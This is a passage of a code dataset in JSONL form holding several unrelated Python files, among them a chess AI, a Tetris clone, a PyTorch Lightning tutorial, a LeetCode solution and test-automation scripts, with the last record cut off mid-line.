self.assertEqual(move, Move(WHITE_COLOR, Vertex.from_string(\"c3\")))\n \n def testSecondMove(self):\n \n self.board.make_move(Move(BLACK_COLOR, Vertex.from_string(\"c3\")))\n \n openingKnowledge = OpeningKnowledge(WHITE_COLOR)\n \n move = openingKnowledge.get_opening_move(self.board)\n \n self.assertTrue(move)\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"test/model/OpeningKnowledgeTest.py","file_name":"OpeningKnowledgeTest.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"220792663","text":"from pyofss import *\n\nsys = System( Domain() )\n\ngaussian = Gaussian()\nsys.add( gaussian )\n\nsys.run()\n\nsys.field\n\nP_t = temporal_power( sys.field )\nP_nu = spectral_power( sys.field, True )\n\ndouble_plot( sys.domain.t, P_t,\n sys.domain.nu, P_nu,\n labels['t'], labels['P_t'], labels['nu'], labels['P_nu'])\n","sub_path":"1.System/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"529173536","text":"#\n# Copyright 2016 The BigDL Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch\nfrom torchvision import transforms\nfrom torchvision.datasets import OxfordIIITPet\nfrom torch.utils.data.dataloader import DataLoader\nimport torch\nfrom torchvision.models import resnet18\nfrom bigdl.nano.pytorch import Trainer\nimport pytorch_lightning as pl\n\n\nclass MyLightningModule(pl.LightningModule):\n\n def __init__(self):\n super().__init__()\n self.model = resnet18(pretrained=True)\n num_ftrs = self.model.fc.in_features\n # Here the size of each output sample is set to 37.\n self.model.fc = torch.nn.Linear(num_ftrs, 37)\n self.criterion = torch.nn.CrossEntropyLoss()\n\n def forward(self, x):\n return self.model(x)\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n output = self.model(x)\n loss = self.criterion(output, y)\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n output = self.forward(x)\n loss = self.criterion(output, y)\n pred = torch.argmax(output, dim=1)\n acc = torch.sum(y == pred).item() / (len(y) * 1.0)\n metrics = {'test_acc': acc, 'test_loss': loss}\n self.log_dict(metrics)\n\n def configure_optimizers(self):\n return torch.optim.SGD(self.parameters(), lr=0.01, momentum=0.9, weight_decay=5e-4)\n\n\ndef create_dataloaders():\n train_transform = transforms.Compose([transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ColorJitter(brightness=.5, hue=.3),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n val_transform = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n\n # Apply data augmentation to the tarin_dataset\n train_dataset = OxfordIIITPet(root=\"/tmp/data\", transform=train_transform, download=True)\n val_dataset = OxfordIIITPet(root=\"/tmp/data\", transform=val_transform)\n\n # obtain training indices that will be used for validation\n indices = torch.randperm(len(train_dataset))\n val_size = len(train_dataset) // 4\n train_dataset = torch.utils.data.Subset(train_dataset, indices[:-val_size])\n val_dataset = torch.utils.data.Subset(val_dataset, indices[-val_size:])\n\n # prepare data loaders\n train_dataloader = DataLoader(train_dataset, batch_size=32)\n val_dataloader = DataLoader(val_dataset, batch_size=32)\n\n return train_dataloader, val_dataloader\n\n\nif __name__ == \"__main__\":\n\n model = MyLightningModule()\n train_loader, val_loader = create_dataloaders()\n\n # NHWC is an alternative way of describing the tensor dimensions.\n # NHWC performance is much better performance than NCHW (contiguous storage of tensor),\n # and operator coverage of NHWC would be higher than blocked memory format (to_mkldnn() method), \n # so user experience is better.\n #\n # by setting channels_last=True \n trainer = Trainer(max_epochs=5, channels_last=True)\n trainer.fit(model, train_dataloaders=train_loader)\n trainer.validate(model, dataloaders=val_loader)","sub_path":"python/nano/tutorial/training/pytorch-lightning/lightning_channel_last.py","file_name":"lightning_channel_last.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"491584199","text":"import chess\n\nclass AiPlayer:\n DEPTH = 4\n thres = 1\n pawntable = [\n 0, 0, 0, 0, 0, 0, 0, 0,\n 5, 10, 10,-20,-20, 10, 10, 5,\n 5, -5,-10, 0, 0,-10, -5, 5,\n 0, 0, 0, 20, 20, 0, 0, 0,\n 5, 5, 10, 25, 25, 10, 5, 5,\n 10, 10, 20, 30, 30, 20, 10, 10,\n 50, 50, 50, 50, 50, 50, 50, 50,\n 0, 0, 0, 0, 0, 0, 0, 0]\n\n knightstable = [\n -50,-40,-30,-30,-30,-30,-40,-50,\n -40,-20, 0, 5, 5, 0,-20,-40,\n -30, 5, 10, 15, 15, 10, 5,-30,\n -30, 0, 15, 20, 20, 15, 0,-30,\n -30, 5, 15, 20, 20, 15, 5,-30,\n -30, 0, 10, 15, 15, 10, 0,-30,\n -40,-20, 0, 0, 0, 0,-20,-40,\n -50,-40,-30,-30,-30,-30,-40,-50]\n\n bishopstable = [\n -20,-10,-10,-10,-10,-10,-10,-20,\n -10, 5, 0, 0, 0, 0, 5,-10,\n -10, 10, 10, 10, 10, 10, 10,-10,\n -10, 0, 10, 10, 10, 10, 0,-10,\n -10, 5, 5, 10, 10, 5, 5,-10,\n -10, 0, 5, 10, 10, 5, 0,-10,\n -10, 0, 0, 0, 0, 0, 0,-10,\n -20,-10,-10,-10,-10,-10,-10,-20]\n\n rookstable = [\n 0, 0, 0, 5, 5, 0, 0, 0,\n -5, 0, 0, 0, 0, 0, 0, -5,\n -5, 0, 0, 0, 0, 0, 0, -5,\n -5, 0, 0, 0, 0, 0, 0, -5,\n -5, 0, 0, 0, 0, 0, 0, -5,\n -5, 0, 0, 0, 0, 0, 0, -5,\n 5, 10, 10, 10, 10, 10, 10, 5,\n 0, 0, 0, 0, 0, 0, 0, 0]\n\n queenstable = [\n -20,-10,-10, -5, -5,-10,-10,-20,\n -10, 0, 0, 0, 0, 0, 0,-10,\n -10, 5, 5, 5, 5, 5, 0,-10,\n 0, 0, 5, 5, 5, 5, 0, -5,\n -5, 0, 5, 5, 5, 5, 0, -5,\n -10, 0, 5, 5, 5, 5, 0,-10,\n -10, 0, 0, 0, 0, 0, 0,-10,\n -20,-10,-10, -5, -5,-10,-10,-20]\n\n kingstable = [\n 20, 30, 10, 0, 0, 10, 30, 20,\n 20, 20, 0, 0, 0, 0, 20, 20,\n -10,-20,-20,-20,-20,-20,-20,-10,\n -20,-30,-30,-40,-40,-30,-30,-20,\n -30,-40,-40,-50,-50,-40,-40,-30,\n -30,-40,-40,-50,-50,-40,-40,-30,\n -30,-40,-40,-50,-50,-40,-40,-30,\n -30,-40,-40,-50,-50,-40,-40,-30]\n \n def __init__(self):\n self.count = 0\n self.maxdepth = 0\n self.curdepth = 0\n\n def evaluate(self, board, move=None):\n if move!=None:\n board = chess.Board(board.fen())\n board.push(move)\n \n return self.eval(board)\n \n def eval(self, board):\n if board.is_checkmate():\n if board.turn:\n return -99999\n else:\n return 99999\n if board.is_stalemate():\n return 0\n if board.is_insufficient_material():\n return 0\n \n wp = len(board.pieces(chess.PAWN, chess.WHITE))\n bp = len(board.pieces(chess.PAWN, chess.BLACK))\n wn = len(board.pieces(chess.KNIGHT, chess.WHITE))\n bn = len(board.pieces(chess.KNIGHT, chess.BLACK))\n wb = len(board.pieces(chess.BISHOP, chess.WHITE))\n bb = len(board.pieces(chess.BISHOP, chess.BLACK))\n wr = len(board.pieces(chess.ROOK, chess.WHITE))\n br = len(board.pieces(chess.ROOK, chess.BLACK))\n wq = len(board.pieces(chess.QUEEN, chess.WHITE))\n bq = len(board.pieces(chess.QUEEN, chess.BLACK))\n \n material = 100*(wp-bp)+320*(wn-bn)+330*(wb-bb)+500*(wr-br)+900*(wq-bq)\n \n pawnsq = sum([self.pawntable[i] for i in board.pieces(chess.PAWN, chess.WHITE)])\n pawnsq= pawnsq + sum([-self.pawntable[chess.square_mirror(i)] \n for i in board.pieces(chess.PAWN, chess.BLACK)])\n knightsq = sum([self.knightstable[i] for i in board.pieces(chess.KNIGHT, chess.WHITE)])\n knightsq = knightsq + sum([-self.knightstable[chess.square_mirror(i)] \n for i in board.pieces(chess.KNIGHT, chess.BLACK)])\n bishopsq= sum([self.bishopstable[i] for i in board.pieces(chess.BISHOP, chess.WHITE)])\n bishopsq= bishopsq + sum([-self.bishopstable[chess.square_mirror(i)] \n for i in board.pieces(chess.BISHOP, chess.BLACK)])\n rooksq = sum([self.rookstable[i] for i in board.pieces(chess.ROOK, chess.WHITE)]) \n rooksq = rooksq + sum([-self.rookstable[chess.square_mirror(i)] \n for i in board.pieces(chess.ROOK, chess.BLACK)])\n queensq = sum([self.queenstable[i] for i in board.pieces(chess.QUEEN, chess.WHITE)]) \n queensq = queensq + sum([-self.queenstable[chess.square_mirror(i)] \n for i in board.pieces(chess.QUEEN, chess.BLACK)])\n kingsq = sum([self.kingstable[i] for i in board.pieces(chess.KING, chess.WHITE)]) \n kingsq = kingsq + sum([-self.kingstable[chess.square_mirror(i)] \n for i in board.pieces(chess.KING, chess.BLACK)])\n \n eval = material + pawnsq + knightsq + bishopsq+ rooksq+ queensq + kingsq\n if board.turn:\n return eval\n else:\n return -eval\n \n def quisence(self, board, alpha, beta, depth = 0):\n self.count += 1\n self.maxdepth = max(self.maxdepth, self.DEPTH+depth)\n \n stand_pat = self.evaluate(board)\n if( stand_pat >= beta ):\n return beta\n if( alpha < stand_pat ):\n alpha = stand_pat\n \n for move in board.legal_moves:\n if board.is_capture(move):\n board.push(move) \n score = -self.quisence(board, -beta, -alpha, depth = depth+1 )\n board.pop()\n\n if( score >= beta ):\n return beta\n if( score > alpha ):\n alpha = score \n \n return alpha\n \n def interest(self, board, move):\n tmp = chess.Board(board.fen())\n tmp.push(move)\n return -len(board.attacks(move.from_square)) + len(tmp.attacks(move.to_square))\n \n def negamax(self, board, depth, alpha, beta):\n self.count += 1\n self.maxdepth = max(self.maxdepth, self.DEPTH - depth)\n \n if (depth <= 0):\n return self.quisence(board, alpha, beta)\n \n best = -999999\n for move in sorted([i for i in board.legal_moves], key=lambda move:self.evaluate(board, move)):\n \n d = min(depth-1, 1) if self.interest(board, move) < self.thres else depth-1\n board.push(move)\n \n score = -self.negamax(board, d, -beta, -alpha)\n \n board.pop()\n \n if (score >= beta):\n return score\n if (score > best):\n best = score\n if (score > alpha):\n alpha = score\n return best\n \n def nextMove(self, board):\n max = -999999\n self.count = 0\n self.maxdepth = 0\n res = chess.Move.null()\n alpha, beta = -999999, 999999\n for move in board.legal_moves:\n board.push(move)\n score = -self.negamax(board, self.DEPTH, -beta, -alpha)\n board.pop()\n if score >= beta:\n return score\n if score > max:\n max = score\n res = move\n if score > alpha:\n alpha = score\n return res\n \n def analysis(self):\n return {\"total nodes inspected: \":self.count, \"maximum depth: \":self.maxdepth}","sub_path":"AIplayer.py","file_name":"AIplayer.py","file_ext":"py","file_size_in_byte":7349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"569097721","text":"class Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n # a, b = sorted((nums1, nums2), key=len)\n m, n = len(nums1), len(nums2)\n cut_1 = 0\n cut_2 = 0\n\n # l1:max(nums1_left_part); r1:min(nums1_right_part)\n l1 = 0\n l2 = 0\n r1 = 0\n r2 = 0\n\n # 假设数组长度m小于n,这样是为了算法复杂度在log(min(m,n)),有了假设方便一些\n lo, hi = 0, m\n\n #### 暂时没有加入了#,a的长度变成了2m+1\n # 二分\n while lo <= hi:\n # cut_1和cut_2是索引\n cut_1 = (lo + hi) // 2 # 二分的结果\n cut_2 = (m + n) // 2 - cut_1 - 1\n print(\"cut_1 middle number:\", nums1[cut_1], \"index is\", cut_1)\n print(\"cut_2 middle number:\", nums2[cut_2], \"index is\", cut_2)\n # input(\"etc...\")\n if nums1[cut_1] == \"#\":\n l1 = nums1[cut_1 - 1]\n r1 = nums1[cut_1 + 1]\n else:\n l1 = nums1[cut_1] # 把中位数割到左边\n # r1 = nums1[cut_1 + 1 + 1] #第一次加1是变成#,第二次右移到数字\n r1 = nums1[cut_1] # 中位数既在左边也在右边\n\n if nums2[cut_2] == \"#\":\n l2 = nums2[cut_2 - 1]\n r2 = nums2[cut_2 + 1]\n else:\n l2 = nums2[cut_2] # 把中位数割到左边\n # r2 = nums2[cut_2 + 1 + 1] #第一次加1是变成#,第二次右移到数字\n r2 = nums2[cut_2] # 中位数既在左边也在右边\n\n print(\"l1:\", l1)\n print(\"r1:\", r1)\n print(\"l2:\", l2)\n print(\"r2:\", r2)\n\n if l1 > r2:\n # c1 左移,c2自动就右移了\n hi = cut_1 - 1\n elif l2 > r1:\n # c1 右移\n lo = cut_1 + 1\n else:\n break\n print(\"切割的位置:\")\n print(\"nums1\", nums1, \"切割的位置是\", cut_1)\n print(\"nums2\", nums2, \"切割的位置是\", cut_2)\n middle = (max(l1, l2) + min(r1, r2)) / 2\n print(\"middle is:\", middle)\n return middle\n\n\nif __name__ == '__main__':\n # http://www.cnblogs.com/voidsky/p/5373982.html\n # nums1 = [4, 8, 10, 12, 18] # #4#8#10#12#18#\n nums1 = [1, 2, 4, 8, 10] # #4#8#10#12#18#\n nums1_signal = []\n for i in nums1:\n nums1_signal.append('#')\n nums1_signal.append(i)\n nums1_signal.append('#')\n\n nums2 = [1, 3, 5, 8, 9, 11, 13]\n nums2_signal = []\n for i in nums2:\n nums2_signal.append('#')\n nums2_signal.append(i)\n nums2_signal.append('#')\n s = Solution()\n print(nums1_signal)\n print(nums2_signal)\n input(\"etc...\")\n m = len(nums1_signal)\n n = len(nums2_signal)\n if m < n:\n res = s.findMedianSortedArrays(nums1_signal, nums2_signal)\n else:\n res = s.findMedianSortedArrays(nums2_signal, nums1_signal)\n print(res)\n","sub_path":"leetcode/lc-all-solutions-master/004.median-of-two-sorted-arrays/my_median-of-two-sorted-arrays.py","file_name":"my_median-of-two-sorted-arrays.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"473515788","text":"# Copyright 2014 - Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom mistral import exceptions as exc\nfrom mistral.workflow import states\n\n\ndef _get_context(task_ex):\n return task_ex.runtime_context['with_items']\n\n\ndef get_count(task_ex):\n return _get_context(task_ex)['count']\n\n\ndef get_index(task_ex):\n return _get_context(task_ex)['index']\n\n\ndef get_concurrency_spec(task_spec):\n policies = task_spec.get_policies()\n\n return policies.get_concurrency() if policies else None\n\n\ndef get_indexes_for_loop(task_ex, task_spec):\n concurrency_spec = get_concurrency_spec(task_spec)\n concurrency = task_ex.runtime_context['concurrency']\n index = get_index(task_ex)\n\n number_to_execute = (get_count(task_ex) - index\n if not concurrency_spec else concurrency)\n\n return index, index + number_to_execute\n\n\ndef do_step(task_ex):\n with_items_context = _get_context(task_ex)\n\n if with_items_context['capacity'] > 0:\n with_items_context['capacity'] -= 1\n\n with_items_context['index'] += 1\n\n task_ex.runtime_context.update({'with_items': with_items_context})\n\n\ndef prepare_runtime_context(task_ex, task_spec, input_dicts):\n runtime_context = task_ex.runtime_context\n with_items_spec = task_spec.get_with_items()\n\n if with_items_spec:\n # Prepare current indexes and parallel limitation.\n runtime_context['with_items'] = {\n 'capacity': get_concurrency_spec(task_spec),\n 'index': 0,\n 'count': len(input_dicts)\n }\n\n\ndef validate_input(with_items_input):\n # Take only mapped values and check them.\n values = with_items_input.values()\n\n if not all([isinstance(v, list) for v in values]):\n raise exc.InputException(\n \"Wrong input format for: %s. List type is\"\n \" expected for each value.\" % with_items_input\n )\n\n required_len = len(values[0])\n\n if not all(len(v) == required_len for v in values):\n raise exc.InputException(\n \"Wrong input format for: %s. All arrays must\"\n \" have the same length.\" % with_items_input\n )\n\n\ndef iterations_completed(task_ex):\n completed = all([states.is_completed(ex.state)\n for ex in task_ex.executions])\n return completed\n","sub_path":"mistral/workflow/with_items.py","file_name":"with_items.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"88422250","text":"#!/usr/bin/python3\nimport os\nimport time\nimport unittest\n\nimport HtmlTestRunner\n\nfrom common.appium_server import AppiumServer\nfrom common.create_test_script import create_test_script\nfrom common.variable import GetVariable as common\n\n\ndef main():\n # 获取当前路径\n def PATH(p): return os.path.abspath(p)\n path = os.getcwd()\n\n # 测试脚本路径\n case_path = PATH(os.path.join(path, 'case/script'))\n if not os.path.exists(case_path):\n os.makedirs(case_path)\n\n # 生成测试脚本\n #case路径 case/case_yaml/home/title.yaml\n try:\n create_test_script(path, \"case/case_yaml\", \"case/script\")\n except FileNotFoundError as e:\n print(\"用例文件不存在\")\n raise e\n # 测试报告,截图路径\n now = time.strftime(\"%Y-%m-%d_%H%M%S\")\n report_path = PATH(os.path.join(path,\"reports\",now))\n screen_path = PATH(os.path.join(report_path,\"screen\"))\n os.makedirs(screen_path)\n common.IMAGE_PATH = screen_path\n\n #类Unix系统拼接\"/\"用来展示完整的截图路径\n screen_linux_path = screen_path + \"/\"\n \n # 启动appium\n appium = AppiumServer()\n appium.start_server()\n time.sleep(5)\n\n # 初始化测试套件\n suite = unittest.TestSuite()\n discover = unittest.defaultTestLoader.discover(\n case_path, pattern=\"test_*.py\", top_level_dir=None)\n for d in discover:\n suite.addTest(d)\n\n # 开始执行测试\n runner = HtmlTestRunner.HTMLTestRunner(output=now, screen_path=screen_linux_path, report_title=\"Android Contestia Test Report\")\n runner.run(suite)\n\n #关闭appium\n appium.stop_server()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"290649927","text":"import numpy as np\nfrom sklearn.cluster import DBSCAN\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.preprocessing import StandardScaler\n\n# load the data set\n# #############################################################################\n# Generate sample data\ncenters = [[1, 1], [-1, -1], [1, -1]]\nX, labels_true = make_blobs(n_samples=750, centers=centers, cluster_std=0.4,\n random_state=0)\n\nX = StandardScaler().fit_transform(X)\ndb = DBSCAN(eps=0.3, min_samples=10).fit(X)\n\n# (excerpt from https://scikit-learn.org/stable/auto_examples/cluster/plot_dbscan.html\n# sphx-glr-auto-examples-cluster-plot-dbscan-py\n# \"mask\" is a programming term denoting a configuration of\n# truth values which is used to select elements of another\n# sequence of the same length. The False values are said to\n# \"mask\" the corresponding elements of the second sequence,\n# the True values \"unmask\" the corresponding elements\ncore_samples_mask = np.zeros_like(db.labels_, dtype=bool)\ncore_samples_mask[db.core_sample_indices_] = True\nlabels = db.labels_\nn_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n\n\nplt.plot(X[:, 0], X[:, 1], 'ko')\nplt.show()\n\nunique_labels = set(labels)\ncolors = [plt.cm.Spectral(each)\n for each in np.linspace(0, 1, len(unique_labels))]\nfor k, col in zip(unique_labels, colors):\n if k == -1:\n # Black used for noise.\n col = [0, 0, 0, 1]\n\n class_member_mask = (labels == k)\n\n xy = data[class_member_mask & core_samples_mask]\n plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),\n markeredgecolor='k', markersize=4)\n\n xy = data[class_member_mask & ~core_samples_mask]\n plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),\n markeredgecolor='k', markersize=2)\n\nplt.title('Estimated number of clusters: %d' % n_clusters_)\nplt.show()\n\n","sub_path":"1/dbscan_exp.py","file_name":"dbscan_exp.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"367078338","text":"from woocommerce import API\nimport credentials as cd\n\nwcapi = API(\n url=\"https://minimeis.com\",\n consumer_key=cd.api_key,\n consumer_secret=cd.user_secret,\n version=cd.version\n)\nprint(cd.api_key)\nresp = wcapi.get('products')\nprint(resp.status_code)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"567486621","text":"# -*- coding:utf-8 -*-\n\nimport ctypes\nimport time\nimport os,sys\n\nsys.path.append(os.path.join(os.path.split(os.path.dirname(os.path.abspath(__file__)))[0], 'config'))\nfrom common import *\nos.putenv('path', os.environ['path'] + ';' + DLL_PATH)\n\n\nclass SEVB0027(object):\n def __init__(self, path):\n self.handle = 0\n self.dll = ctypes.cdll.LoadLibrary(path)\n\n def sevb27_4001_init(self, sn):\n p_handle = ctypes.pointer(ctypes.c_int())\n try:\n sn = sn.split('\"')[1]\n sn = sn.encode(\"utf-8\")\n except:\n sn = sn.encode(\"utf-8\")\n error = self.dll.SEVB0027_4001_Init(p_handle, sn)\n if 0 == error:\n self.handle = p_handle.contents.value\n return error\n\n def sevb27_4001_setchannel(self, channel):\n return self.dll.SEVB0027_4001_SetChannel(self.handle, ctypes.c_int(channel))\n\n\nif __name__ == '__main__':\n clock = SEVB0027(DLL_PATH+ '\\\\SEVB0027_4001.dll')\n if clock.sevb27_4001_init(\"SEVB270113071894\"):\n print('no')\n while True:\n if clock.sevb27_4001_setchannel(2):\n print('no')\n time.sleep(1)\n if clock.sevb27_4001_setchannel(4):\n print('no')\n time.sleep(1)\n","sub_path":"ATE_unittest/TestTool_File/sevb0027.py","file_name":"sevb0027.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"115882271","text":"import subprocess\nimport os\n\npath = 'data/'\njsons = [jsonfile for jsonfile in os.listdir(path) if jsonfile.endswith('.json')]\n\nfor jsonfile in jsons:\n\toutfile = jsonfile.split('.json')[0] + '_cleaned.json'\n\tsubprocess.check_output([\"cat\", jsonfile, \"|\", \"jq\", \"'.'\", \"-c\", \">\", outfile])\n\t\n\n","sub_path":"clean_json.py","file_name":"clean_json.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"644035430","text":"# Import a library of functions called 'pygame'\nimport pygame\nimport time\n# Import the Gameboard class\nfrom GameBoard import GameBoard\nfrom GameBoard import gameboardheight\n# Import the Shape class\nfrom Shape import Shape\nfrom BottomShape import BottomShape\n\n# Define some colours RGB\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255,255,0)\nMAGENTA = (255,0,255)\nTURQUOISE = (0,206,209)\n\n\nif __name__ == \"__main__\":\n # Initialize the game engine\n pygame.init()\n # Engine used for sounds\n pygame.mixer.init()\n #sets the screen size to 800 pixel width and 600 pixel height\n size = (800, 600)\n # our first shape\n shape = Shape()\n bottomshape = BottomShape(shape.shapeNum)\n # the next shape\n nextshape = Shape()\n # our game board\n gameboard = GameBoard(WHITE, shape.blockList[0].size)\n slowtimedelay = 0\n myfont = pygame.font.Font('freesansbold.ttf', 30)\n HSfont = pygame.font.Font('freesansbold.ttf', 20)\n namelist = [0 for y in range(5)]\n scorelist = [0 for y in range(5)]\n HSfile = open(\"HighScores.txt\", \"r\") # opens the text file HighScores\n for i in range(5):\n namelist[i] = HSfile.readline().rstrip('\\n') # reads in the name minus the blank line\n for i in range(5):\n scorelist[i] = HSfile.readline().rstrip('\\n') # reads in the score minus the blank line\n HSfile.close() # closes the text file HighScores\n # loop control variable that will become true and close the program when we click the X\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption(\"Tetris Clone - By Scott King\")\n # used for delaying the timer. Initialized to 0\n delay = 0\n pygame.mixer.music.load('RoyaltyFreeBGM.mp3')\n pygame.mixer.music.play(-1) # we use -1 to make it loop\n name = \"\" # used for storing the player's name by default it is empty\n # Loop until the user clicks the close button.\n exitGame = False\n gameStarted = False\n\ndef keyCheck():\n if event.key == pygame.K_LEFT:\n shape.moveLeft()\n elif event.key == pygame.K_RIGHT:\n shape.moveRight()\n elif event.key == pygame.K_d:\n shape.moveDown()\n elif event.key == pygame.K_UP:\n shape.rotateCW()\n elif event.key == pygame.K_DOWN:\n shape.rotateCCW()\n elif event.key == pygame.K_SPACE:\n #increase score based on how far it is dropped\n gameboard.score += (gameboardheight - shape.blockList[0].gridYpos)\n shape.drop()\n elif event.key == pygame.K_t and gameboard.numslowtime > 0:\n gameboard.numslowtime -= 1\n gameboard.slowtimeon = True\n elif event.key == pygame.K_s and gameboard.numswap > 0:\n gameboard.numswap -= 1\n gameboard.swapshape = True\n\n\ndef drawScreen():\n screen.fill(BLACK) # fills the screen with the specified colour\n # draw a shape to the screen\n shape.draw(screen)\n bottomshape.draw(screen)\n # draw the next shape to the screen\n nextshape.drawnextshape(screen)\n # draw the game board to the screen\n gameboard.draw(screen)\n #displays the score to the screen\n scoretext = myfont.render(\"Score: \" + str(gameboard.score), 1, WHITE)\n screen.blit(scoretext, (400, 400))\n # display the number of lines\n numcompletelinestext = myfont.render(\"Lines: \" + str(gameboard.numlines), 1, WHITE)\n screen.blit(numcompletelinestext, (400, 350))\n # display the level\n leveltext = myfont.render(\"Level: \" + str(gameboard.level), 1, WHITE)\n screen.blit(leveltext, (400, 300))\n # Display the next shape\n nextshapetext = myfont.render(\"Next: \", 1, WHITE)\n screen.blit(nextshapetext, (400, 50))\n # Display Power ups\n poweruptext = myfont.render(\"Power Ups: \", 1, WHITE)\n screen.blit(poweruptext, (50, 525))\n # Display number of slow time power ups available\n numslowtimetext = myfont.render(\" x\" + str(gameboard.numslowtime), 1, WHITE)\n screen.blit(numslowtimetext, (310, 525))\n slowtime_image = pygame.image.load(\"clock.png\")\n # Display number of swap shape power ups available\n numswaptext = myfont.render(\" x\" + str(gameboard.numswap), 1, WHITE)\n screen.blit(numswaptext, (435, 525))\n swap_image = pygame.image.load(\"swap.png\")\n screen.blit(swap_image, (375, 515))\n screen.blit(slowtime_image, (250, 515))\n pygame.draw.rect(screen, WHITE, [400, 100, 6 * shape.blockList[0].size, 6 * shape.blockList[0].size], 1)\n # Display the name\n playernametext = myfont.render(\"Player: \" + name, 1, WHITE)\n screen.blit(playernametext, (515, 525))\n # Display the high scores\n highscoretext = myfont.render(\"High Scores\", 1, WHITE)\n screen.blit(highscoretext, (575, 50))\n for i in range(5):\n hsnametext = HSfont.render(str(namelist[i]), 1, WHITE)\n hsscoretext = HSfont.render(str(scorelist[i]), 1, WHITE)\n screen.blit(hsnametext, (580, i * 25 + 125))\n screen.blit(hsscoretext, (700, i * 25 + 125))\n pygame.draw.rect(screen, WHITE, [575, 100, 200, 400], 1)\n pygame.display.flip() # updates the screen with everything we've drawn\n\ndef checkHighScores():\n newhighscore = False\n tempnamelist = [0 for y in range(5)]\n tempscorelist = [0 for y in range(5)]\n for i in range(5):\n if gameboard.score > int(scorelist[i]) and newhighscore == False:\n newhighscore = True\n tempscorelist[i] = gameboard.score\n tempnamelist[i] = name\n elif newhighscore == True:\n tempscorelist[i] = scorelist[i-1]\n tempnamelist[i] = namelist[i-1]\n else:\n tempscorelist[i] = scorelist[i]\n tempnamelist[i] = namelist[i]\n\n for i in range(5):\n scorelist[i] = tempscorelist[i]\n namelist[i] = tempnamelist[i]\n\n HSfile = open(\"HighScores.txt\", \"w\")\n for i in range(5):\n HSfile.write(namelist[i] + '\\n')\n\n for i in range(5):\n HSfile.write(str(scorelist[i]) + '\\n')\n HSfile.close()\n\n\n\n#-------- Title Screen ---------------\nwhile not gameStarted:\n titlescreen = pygame.image.load(\"Backdrop.png\")\n enterednametext = myfont.render(\"Please Type in Your Name:\", 1, WHITE)\n nametext = myfont.render(name, 1, WHITE)\n screen.blit(enterednametext, (200, 200))\n screen.blit(nametext, (300, 250))\n pygame.display.flip()\n screen.blit(titlescreen, (0, 0))\n\n # --- Main event loop\n for event in pygame.event.get(): # User did something\n if event.type == pygame.QUIT: # If user clicked close\n exitGame = True # Flag that we are done so we exit this loop\n gameStarted = True\n if event.type == pygame.KEYDOWN:\n if event.key >= 33 and event.key <= 126 and len(name) < 10:\n name = name + chr(event.key) # adds another character to the name\n if event.key == pygame.K_BACKSPACE: # removes the last character in the name\n name = name[:-1]\n if event.key == pygame.K_RETURN:\n if name == \"\": # if it's blank set it to Player1\n name = \"Player1\"\n gameStarted = True # start the game\n\n# -------- Main Program Loop -----------\nwhile not exitGame:\n# --- Main event loop\n for event in pygame.event.get(): #user did something\n if event.type == pygame.QUIT: #If user clicked close\n exitGame = True # Flag that we are done so we exit this loop\n elif event.type == 